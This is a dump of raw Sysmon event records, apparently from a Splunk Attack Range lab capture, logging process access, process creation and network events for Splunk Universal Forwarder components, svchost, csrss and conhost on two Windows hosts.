Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:17.316{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:17.316{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:17.316{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:17.316{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000217998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:17.316{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-1919-629A-2F47-000000005F02}7980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000217997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:17.316{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-1919-629A-2F47-000000005F02}7980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000217996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:17.314{2E1864BB-1919-629A-2F47-000000005F02}7980C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000044954Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:15.695{0A5DF930-E3C7-6299-CE00-000000006002}1272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ct-attack-range-726.eu-central-1.compute.internal52394-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000044953Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:17.487{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16B9C5ADB879BC434305924926F06597,SHA256=34CAC09A0AD98AA6BA9597A174744D580D8BEA22009AACEA2A57A80415CF3272,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218014Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:16.826{2E1864BB-E1C6-6299-D800-000000005F02}3988C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ct-attack-range-304.attackrange.local56434-false10.0.1.12-8000- 10341000x8000000000000000218013Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:18.481{2E1864BB-191A-629A-3047-000000005F02}79362428C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218012Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:18.194{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-191A-629A-3047-000000005F02}7936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:18.194{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:18.194{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:18.194{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:18.194{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:18.194{2E1864BB-E13C-6299-0500-000000005F02}416536C:\Windows\system32\csrss.exe{2E1864BB-191A-629A-3047-000000005F02}7936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:18.194{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-191A-629A-3047-000000005F02}7936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:18.195{2E1864BB-191A-629A-3047-000000005F02}7936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000044955Microsoft-Windows-Sysmon/Operationalwin-host-ct-attack-range-726-2022-06-03 14:22:18.581{0A5DF930-E3CD-6299-E900-000000006002}4064NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C1867562975624D5BF738E3E799C208E,SHA256=B631FDE048C2FF272C792E76F4BA476C7F6B575C728E44093A0903C1F961B5D8,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218031Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:19.865{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-191B-629A-3247-000000005F02}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218030Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:19.865{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218029Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:19.865{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218028Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:19.865{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218027Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:19.865{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218026Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:19.865{2E1864BB-E13C-6299-0500-000000005F02}416432C:\Windows\system32\csrss.exe{2E1864BB-191B-629A-3247-000000005F02}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218025Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:19.865{2E1864BB-E1BD-6299-A700-000000005F02}47004496C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2E1864BB-191B-629A-3247-000000005F02}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218024Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:19.867{2E1864BB-191B-629A-3247-000000005F02}4288C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{2E1864BB-E13C-6299-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{2E1864BB-E1BD-6299-A700-000000005F02}4700C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218023Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:19.018{2E1864BB-E1CC-6299-F500-000000005F02}792NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=088F4F887D4464DAEB82FDB55630877A,SHA256=D22F14AEFC694EC40C302DE69D32FE2D9AC576EF8291F4020E25C0C780A62E21,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218022Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:22:19.018{2E1864BB-E1BE-6299-AB00-000000005F02}92876C:\Windows\system32\conhost.exe{2E1864BB-191B-629A-3147-000000005F02}5828C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 